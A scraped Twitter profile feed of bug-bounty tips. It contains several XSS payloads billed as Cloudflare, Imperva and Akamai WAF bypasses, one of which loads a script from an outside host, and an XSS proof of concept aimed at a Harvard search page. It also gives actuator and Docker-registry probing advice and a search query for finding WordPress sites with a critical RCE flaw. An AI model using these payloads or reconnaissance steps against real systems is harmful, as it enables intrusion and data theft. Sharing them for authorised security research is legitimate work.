Siva Rajendran (@0xsh1v4) 's Twitter Profile
Siva Rajendran

@0xsh1v4

Security Researcher; OSCP, CRTE; 📍 🇩🇪 ; SRT, Bug-bounty hunter; 🇮🇳

ID: 177138142

linkhttps://0xsh1v4.github.io calendar_today11-08-2010 10:12:22

1,1K Tweet

255 Followers

974 Following

Alexander Myasoedov (@arekusandr_) 's Twitter Profile Photo

INTRODUCING: Agentic Security - LLM Security Scanner! 🔍 🔑 Features: Scans for prompt injections, jailbreaking & more. Provides detailed reports & options to customize attack rules. 🔗access the GitHub Link ↓

KNOXSS (@kn0x55) 's Twitter Profile Photo

#XSS #WAF #Bypass ➡️ CloudFlare <Img Src=OnXSS OnError=alert(1)> ➡️ Imperva <Img Src=//X55.is OnLoad%0C=import(Src)// ➡️ Akamai <A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)> Sign up now! knoxss.me 😎 By Brute Logic

Otterly (@ott3rly) 's Twitter Profile Photo

If you have issues bypassing WAF on POST/PUT/PATCH methods manually, you could try this extension: github.com/assetnote/nowa… Absolute game-changer. Credits to shubs for bringing this in for public. #bugbounty

xss0r (@xss0r) 's Twitter Profile Photo

🚀 #IBRAHIMXSS Tool Giveaway! 🚀 To celebrate the upcoming release of my #IBRAHIMXSS Tool in just 3 days, I’m giving away #FREE access for 3 months to 3 lucky winners! 🎉 ~How to enter: Share this post 💠 Repost Like this post 👍 It’s that simple! The giveaway starts now

Elon Musk (@elonmusk) 's Twitter Profile Photo

Nice work by @xAI team, X team, @Nvidia & supporting companies getting Memphis Supercluster training started at ~4:20am local time. With 100k liquid-cooled H100s on a single RDMA fabric, it’s the most powerful AI training cluster in the world!

Ali (@111xnagashy) 's Twitter Profile Photo

Add to your wordlist : actuator/env actuator/auditevents actuator/beans actuator/caches actuator/configprops actuator/health actuator/heapdump actuator/info actuator/integrationgraph actuator/configprops #bugbountytip #bugbountytips #bugbounty #hackerone #bugcrowd #h1

Add to your wordlist : 
actuator/env
actuator/auditevents
actuator/beans
actuator/caches
actuator/configprops
actuator/health
actuator/heapdump
actuator/info
actuator/integrationgraph
actuator/configprops
#bugbountytip #bugbountytips #bugbounty #hackerone #bugcrowd #h1
𐰚𐰼𐰇𐱅 (@ynsmroztas) 's Twitter Profile Photo

If you discover the Docker Registry Domain, be sure to check the /v2/_catalog endpoint, as this domain should be 401, if access is allowed. you can get everything 🥰 so you can disclose sensitive data, rce, all information #bugbountytips #BugBounty github.com/Syzik/DockerRe…

If you discover the Docker Registry Domain, be sure to check the /v2/_catalog endpoint, as this domain should be 401, if access is allowed.
you can get everything 🥰 so you can disclose sensitive data, rce, all information

#bugbountytips #BugBounty 

github.com/Syzik/DockerRe…
𐰚𐰼𐰇𐱅 (@ynsmroztas) 's Twitter Profile Photo

If you encounter the default IIS Windows window, do not forget to add /haproxy and /netdata to your wordlist and scan them, if you gain unauthorized access here, you will earn a reward 🌹🥰 #bugbountytips #BugBounty

If you encounter the default IIS Windows window, do not forget to add /haproxy and /netdata to your wordlist and scan them, if you gain unauthorized access here, you will earn a reward 🌹🥰

#bugbountytips #BugBounty
Hunter (@huntermapping) 's Twitter Profile Photo

🚨Alert🚨CVE-2024-5932 (CVSS 10): Critical RCE Vulnerability Impacts 100k+ WordPress Sites! 📊 173K+ Services are found on hunter.how yearly 🔗Hunter Link: hunter.how/list?searchVal… 👇Search Query HUNTER: web.body="/wp-content/plugins/give"

🚨Alert🚨CVE-2024-5932 (CVSS 10): Critical RCE Vulnerability Impacts 100k+ WordPress Sites!
📊 173K+ Services are found on hunter.how yearly
🔗Hunter Link: hunter.how/list?searchVal…
👇Search Query
HUNTER:  web.body="/wp-content/plugins/give"
Ali (@111xnagashy) 's Twitter Profile Photo

W.AF AKAM.AI by.pass Lead to 30 XSS in large BBP🤯 "><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto"> Writeup Soon🫡 #bugbountytips #bugbountytip #bugbounty #hackerone #bugcrowd

W.AF AKAM.AI by.pass  
Lead to 30 XSS in large BBP🤯

"&gt;&lt;input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto"&gt;

Writeup Soon🫡

#bugbountytips #bugbountytip #bugbounty #hackerone #bugcrowd
zhero; (@zhero___) 's Twitter Profile Photo

Ali congratulations for your reports however it is only the newly introduced JS event; most WAFs have not added it yet remember to credit the author: Masato Kinugawa x.com/kinugawamasato…

𐰚𐰼𐰇𐱅 (@ynsmroztas) 's Twitter Profile Photo

always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints 🌹🥰🥳 #bugbountytip #bugbounty

always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA

from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints 🌹🥰🥳

#bugbountytip #bugbounty
Mejbaur Bahar Fagun (@fagun018) 's Twitter Profile Photo

🚨 XSS Alert! 🚨 Just exploited an XSS vulnerability on Harvard 🔥 Watch out for reflected XSS in the search parameter! Here's the PoC: "-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>" #bugbounty #cybersecurity #XSS #mejbaurbaharfagun #bug #bounty

🚨 XSS Alert! 🚨

Just exploited an XSS vulnerability on Harvard 🔥 Watch out for reflected XSS in the search parameter!

Here's the PoC:

"--&gt;""/&gt;Hack by Fagun&lt;/script&gt;&lt;deTailS open x="&gt;" ontoggle=(co\u006efirm)``&gt;"

#bugbounty #cybersecurity #XSS #mejbaurbaharfagun #bug #bounty
Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

A solid XSS payload that bypasses Imperva WAF ⚙️ <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click #infosec #cybersec #bugbountytips

zhero; (@zhero___) 's Twitter Profile Photo

with the security advisory published, I should publish my paper within a few hours Race-Condition to Cache Poisoning - CVE-2025-32421 on Next.js partially leading to the bypass of my previous vulnerability the CVE-2024-46982

with the security advisory published, I should publish my paper within a few hours

Race-Condition to Cache Poisoning - CVE-2025-32421 on <a href="/nextjs/">Next.js</a> 

partially leading to the bypass of my previous vulnerability the CVE-2024-46982